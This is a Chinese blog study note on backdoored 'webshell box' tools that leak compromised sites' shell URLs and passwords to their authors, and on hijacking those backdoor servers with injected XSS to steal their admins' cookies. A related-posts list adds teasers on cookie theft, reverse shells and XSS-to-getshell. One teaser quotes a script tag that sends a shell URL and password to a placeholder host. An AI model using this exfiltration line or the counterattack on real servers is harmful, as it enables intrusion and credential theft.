XSS跨站订单和shell反杀

最新推荐文章于 2024-07-23 21:38:08 发布
最新推荐文章于 2024-07-23 21:38:08 发布
阅读量297 收藏 2
点赞数
文章标签: xss 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50613938/article/details/121107995
版权

Webshell箱子:相信很多人都使用过asp或者php的大马,一般这些大马的代码都是加密过的,这就存在一些猫腻了,因为在这些加密过的代码中有着后门代码,这些后门会将你找到的shell发送到他的服务器,就相当于你给别人打工。

废话不多说,实战来演示一下webshell箱子:
1、首先我们搭建一下asp服务器来放置webshell箱子(后门)
在这里插入图片描述

2、然后进入我们的后门网页,默认账号密码都是admin
在这里插入图片描述

3、随意构造一个一句话木马,然后再一句话木马代码里插入javascript语句来制作后门(调用webshell箱子里的api.asp文件)。
在这里插入图片描述

4、当你插入这个一句话木马在某个网页,它会发送这个网页的url以及一句话木马的密码到后门服务器
在这里插入图片描述
5、当我们使用一些大马时可以通过抓包来判断是否有后门
当我们找到后门服务器的地址后,可以通过插入XSS语句来反杀后门
利用burp抓到发送到后门服务器的包,将发送的参数修改成xss代码在一句话木马将我们网页信息发送到后台服务器的时候,我们就可以顺势拿到后台服务器的包了

然后去后门服务器地址看一下,出现弹窗

如果我们把这个xss代码改为获取cookie的代码,就可以把这个后台给拿下!后门作者以为你在第一层,其实你在第五层
虽然好像是被插入了一句话木马,但是实际上我们获得了后台地址并进行了xss攻击

落夜雨
关注
XSS----shellcode的调用
喝咖啡的猫的博客
09-24 814
shellcode、exploit、poc shellcode:最初是指溢出程序和蠕虫病毒核心,实际上是指利用漏洞所执行的一段代码 Exploit:英文意思利用,编写好的漏洞利用工具或程序,具有攻击性 Poc:Proof of Concept缩写,是一段证明漏洞存在的程序代码 动态调用远程JavaScript(缺点是URL中容易显露出来) 格式:...
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2666
xss学习笔记
第26天:WEB漏洞-XSS跨站订单Shell箱子反杀记1
08-03
WEB 漏洞-XSS 跨站订单Shell 箱子反杀#XSS 平台及工具使用#XSS 经典应用案例测试#Session 与 Cookie 获取问题docum
XSS-窃取Cookie及拓展
最新发布
2301_76631050的博客
07-23 884
步骤一:来到xss平台 点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二:用记事本打开1.js 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。步骤七:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋:配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!步骤二:在我的项目中选择我们刚创建的项目,点击右上角的查看配置代码。把文件复制到我们网站的根目录下。
小迪安全学习笔记--第26天:web漏洞-xss跨站订单shell箱子反杀
zr1213159840的博客
01-03 545
xss平台及工具使用 postman可以通过获取的cookie登录网站的后台 beef工具必须在linux中才可以使用。 xss经典应用案例测试 webshell后门中的后门 箱子返回的代码中添加后门,然后获取到箱子的cookie后台 session与cookie获取问题 document.cookie等 代码中通过这个函数来获取cookie 配合读取phpinfo等源码信息等 案例演示 某营销订单系统化xss盲打_平台 某shell箱子系统xss盲打_工具 其他参考应用案例-后台权限维持 工具http/.
WEB漏洞-XSS跨站订单Shell箱子反杀
xhscxj的博客
01-23 494
shell箱子 很多人在网上发布大马,他们在大马中写入了后门。当你成功把有后门的大马上传到目标网站上时,大马就会把该网站的url以及密码发送给在大马留过后门的人。 $_SERVER['HTTP_HOST']//获取当前的url $_SERVER['PHP_SELF']//获取当前访问的文件路径 例子:(留后门的方式有很多,也有可能加密,这里只是举一个例子) 因为代码<script src='http://www.xxx.com/index.php?url=$url&pass=$passwor
2021/12/06 XSS跨站订单shell箱子反杀记,beef
weixin_44532761的博客
12-07 439
小迪 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=25 涉及资源 https://github.com/tennc/webshell https://www.postman.com/downloads/ 订单系统XSS盲打-平台 安装网站 有了前人的教训,先删除了源码install的/install.lock 数据库报错 年????,后台进不去,一看验证码加载不出来,而且路径也不对,把lib放进admin试试 ahhhhh鸡汤…不玩了,打开还
xss跨站订单shell箱子反杀
san3144393495的博客
05-24 950
弹窗1,这是刚刚写的跨站代码语句执行成功了,如果我们写一些可以盗取对方cookie的代码,获取到cookie之后再利用这个cookie去尝试登陆这个后台,可以得到后台的信息,同样后台里面如果说能够进行这个权限提升,我们说的文件上传,尝试文件上传操作拿到网站的webshell,这都是可以进行的后缀操作。这个是可以进行xss漏洞的测试,凡是有这种数据交互的地方,前端有一个数据的接受,后端是数据的显示,这个过程就符合漏洞产生的前提条件,将输入的数据进行个显示,不太推荐那个语句的原因,太明显了,重新访问一下。
2021总结web渗透测试岗位面试题(个人亲身经历的总结)
小羊的博客
11-26 6367
目录 1·拿到一个待检测的站,你觉得应该先做什么? 2·xss 3·sql注入 4·真实ip 5.多地ping 6·应急响应 7·代码注入漏洞 8·sql注入如何读写文件,二次注入,防御方式 9·csrf和xss区别 10·文件上传的后段绕过,防御方式 11·中间件漏洞——IIS、Apache、nginx、Lighttpd、Tomcat 12·xxe与ssrf 13·rce讲一下,php函数eval和system popen 14·缓冲区溢出 15·数据库提权(mysql,ms
史上最全网络安全面试题汇总 ! !
网安技术分享
08-04 9432
php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗透工具有哪些,最常用的是哪个? burp、nmap、sqlmap、awvs、蚁剑、冰蝎、dirsearch、御剑等等 xs
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8088
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
第26天-WEB漏洞-XSS跨站订单Shell箱子反杀
MCTSOG的博客
03-11 1442
思维导图 xss漏洞存在的地方 留言板 评论区 订单系统 意见反馈等 #cookie session 用户凭据:通过凭据可以判断对方身份信息 cookie 存储本地 存活时间较长 小中型 session 会话 存储服务器 存活时间较短 大型 演示案例: 某营销订单系统 XSS 盲打_平台 前端订单界面 后端管理界面 演示这个案例的意图是:了解在什么位置利用xss,从而获取有用信息! 使用xss平台/工具 自己编写代码接收 某 Shell 箱子系统 XSS 盲打_工具 跨站
Web漏洞-XSS跨站订单系统实操-WebShell箱子反杀
ran的博客
03-16 1202
到这里我们就可以联想到,我们可以随便从网上下载一些后门,经过自己的加工加入自己的后门代码之后再重新发布到各类社区或者论坛等平台,取一个牛逼点的名字,当别人利用你的后门来对其它网站进行入侵的时候,你就可以同步获取到他的入侵的网站的信息,就相当于别人在帮我们入侵。因为获取到的网站以及密码等信息会发送到箱子的后台,所以可以想到在密码或者URL等位置插入XSS代码,当管理员查看信封的时候,就可能会触发XSS代码,从而实现反杀。来到网站的后台可以看到刚刚提交的信息被成功上传到了网站的后台。
discuz xssshell
Coisini的博客
05-26 1485
Discuz XSS得webshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...
XSS也能getshell
u014213713的专栏
05-15 5707
我的想法是这样的 有很多CMS都有 修改模板或者修改文件的功能 我们可以自己构造一个外部的URL去post提交修改模板或其他文件 从而实现XSSgetshell !同样这方法能做很多事情比如增加管理员账号什么的 前提条件要管理员登陆状态下 若CMS系统有XSS漏洞那就更完美了 呵呵 我这里随便找了一套带文件增 删 改 的cms测试呵呵(这CMS也有XSS不过因为魔术原因利用起来不太利索,这
[小迪安全25-26天]xss
weixin_54252904的博客
05-21 528
订单cookie窃取和shell箱子反杀简单测试窃取cookie本地构造实现xss攻击1方法2webshell沙箱反杀反杀操作演示存在后门的大马beef结合xss攻击获取session思路 通过提交订单的方式植入xss来获取网站管理员cookie 简单测试 窃取cookie https://www.postman.com/downloads/下载postman 本地构造实现xss攻击1 本地服务器端39.96.44.170 文件jieshou.php <scri
记一次XSS至getshell全过程!
hot_milk1的博客
02-27 1530
偶然在一次渗透过程中发现一个客服系统聊天界面发现可以XSS对发送信息处进行抓包,可在content参数插入xss语句这是访客前台效果:这是后台管理的效果:而且只要客服查看信息,便可以执行XSS语句然并卵,本来想钓客服的cookie,登录后台,找到shell点,成功getshell(幻想时间),但是经过测试,发现该客服系统的session是受保护的,并不能窃取到cookie已经决定放弃这个点了,随后在审计源码后,发现了图片上传点老样子,抓包改后缀解码得知,不支持php的文件格式。
反弹Shell原理与实现
m0_62451321的博客
11-14 3331
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4486
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
全面解析XSS跨站脚本攻击技术
"xss跨站脚本攻击汇总" XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本。这些脚本可以用来窃取用户数据、操纵网页行为或者传播恶意软件。以下是一些常见的XSS攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值